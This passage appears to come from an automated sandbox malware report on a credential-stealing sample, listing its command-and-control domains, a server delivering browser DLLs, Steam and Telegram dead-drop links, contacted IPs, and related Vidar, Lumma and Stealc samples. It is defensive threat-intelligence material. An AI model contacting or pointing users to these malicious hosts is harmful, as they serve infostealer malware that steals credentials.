                          soldiefieop.site
                          		188.114.96.3
                          		truetrueunknown
                          chorusarorp.site
                          		unknown
                          		unknowntrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://mysterisop.site/apitrueunknown
                          https://49.12.197.9/trueunknown
                          https://abnomalrkmu.site/apitrueunknown
                          abnomalrkmu.sitetrueunknown
                          https://soldiefieop.site/apitrueunknown
                          https://49.12.197.9/freebl3.dlltrueunknown
                          https://49.12.197.9/sqlp.dlltrueunknown
                          https://49.12.197.9/softokn3.dlltrueunknown
                          absorptioniw.sitetrueunknown
                          treatynreit.sitetrueunknown
                          https://steamcommunity.com/profiles/76561199724331900true
                          • URL Reputation: malware
                          		unknown
                          questionsmw.stortrue
                            		unknown
                            https://49.12.197.9/vcruntime140.dlltrueunknown
                            https://49.12.197.9/nss3.dlltrue
                              		unknown
                              https://49.12.197.9/mozglue.dlltrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabCAAKFI.3.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=CAAKFI.3.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                http://cowod.hopto.orgRegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://steamcommunity.com/profiles/76561199724331900085;RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown
                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://steamcommunity.com/profiles/76561199780418869/badgesRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                  http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://gravvitywio.store/RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://49.12.197.976561199780418869[1].htm.3.drfalseunknown
                                  https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=eRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://cowod.hopto.RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://49.12.197.9/mozglue.dlliRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                      https://gravvitywio.store/apijRegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://cowod.hoptoRegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://49.12.197.9/freebl3.dllNRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://cowod.hopto.orgBAERegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aRegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://cowod.BFIIDGDGDBAERegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://t.me/ae5edfile.exe, 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                              http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drfalseunknown
                                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://mozilla.org0/RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                              http://www.entrust.net/rpa03file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBAKEBA.3.drfalse
                                                		unknown
                                                https://store.steampowered.com/points/shop/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=CAAKFI.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.ecosia.org/newtab/CAAKFI.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDAKJDH.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aRegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://cowod.hopto.DGDBAERegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://absorptioniw.site/1oRegAsm.exe, 0000000A.00000002.2868690802.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                      		unknown
                                                      https://49.12.197.9FIECGDRegAsm.exe, 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://mysterisop.site/piRegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                        http://cowod.hoptoGDGDBAERegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtDAKJDH.3.drfalse
                                                            		unknown
                                                            https://49.12.197.9/freebl3.dll#RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amRegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://49.12.197.9/vcruntime140.dll~RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://gravvitywio.store/#RegAsm.exe, 0000000A.00000002.2868690802.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://crl.entrust.net/2048ca.crl0file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaRegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drfalse
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.entrust.net/rpa0file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://store.steampowered.com/about/76561199780418869[1].htm.3.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                      		unknown
                                                                      https://49.12.197.9/nss3.dllpRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://49.12.197.9/sqlp.dlliRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://ocsp.entrust.net03file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://ocsp.entrust.net02file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://help.steampowered.com/en/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://steamcommunity.com/market/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                            		unknown
                                                                            https://store.steampowered.com/news/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=CAAKFI.3.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                              		unknown
                                                                              https://steamcommunity.com/M:RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://treatynreit.site/apiGRegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgRegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drfalse
                                                                                    		unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://steamcommunity.com/profiles/76561199780418869/inventory/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                      		unknown
                                                                                      https://steamcommunity.com/discussions/RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        49.12.197.9
                                                                                        		unknownGermany
                                                                                        		24940HETZNER-ASDEtrue
                                                                                        104.21.84.18
                                                                                        		treatynreit.siteUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        104.21.18.193
                                                                                        		snarlypagowo.siteUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        104.21.17.174
                                                                                        		absorptioniw.siteUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        104.21.21.3
                                                                                        		mysterisop.siteUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        188.114.96.3
                                                                                        		soldiefieop.siteEuropean Union
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        104.102.49.254
                                                                                        		steamcommunity.comUnited States
                                                                                        		16625AKAMAI-ASUStrue
                                                                                        172.67.208.141
                                                                                        		questionsmw.storeUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        172.67.152.190
                                                                                        		abnomalrkmu.siteUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        147.45.44.104
                                                                                        		unknownRussian Federation
                                                                                        		2895FREE-NET-ASFREEnetEUfalse
                                                                                        104.21.16.12
                                                                                        		gravvitywio.storeUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        45.132.206.251
                                                                                        		cowod.hopto.orgRussian Federation
                                                                                        		59731LIFELINK-ASRUtrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1524788
                                                                                        Start date and time:2024-10-03 09:14:47 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 26s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:14
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:file.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@15/24@12/12
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 97
                                                                                        • Number of non-executed functions: 114
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        03:16:14API Interceptor4x Sleep call for process: RegAsm.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        49.12.197.9file.exeGet hashmaliciousVidarBrowse
                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                            104.21.84.18Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • markuschop.fun/api
                                                                                                            file.exeGet hashmaliciousLummaC Stealer, onlyLoggerBrowse
                                                                                                            • markuschop.fun/api
                                                                                                            104.21.18.193Setup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                                              66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                  kuly.exeGet hashmaliciousLummaCBrowse
                                                                                                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              https://91f1c1ae.b10b40523cf9ab475706c8ef.workers.dev/Get hashmaliciousHTMLPhisherBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                snarlypagowo.sitefile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 172.67.183.74
                                                                                                                                Setup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                                                                • 104.21.18.193
                                                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 104.21.18.193
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 104.21.18.193
                                                                                                                                kuly.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.18.193
                                                                                                                                klFMCT64RF.exeGet hashmaliciousLummaCBrowse
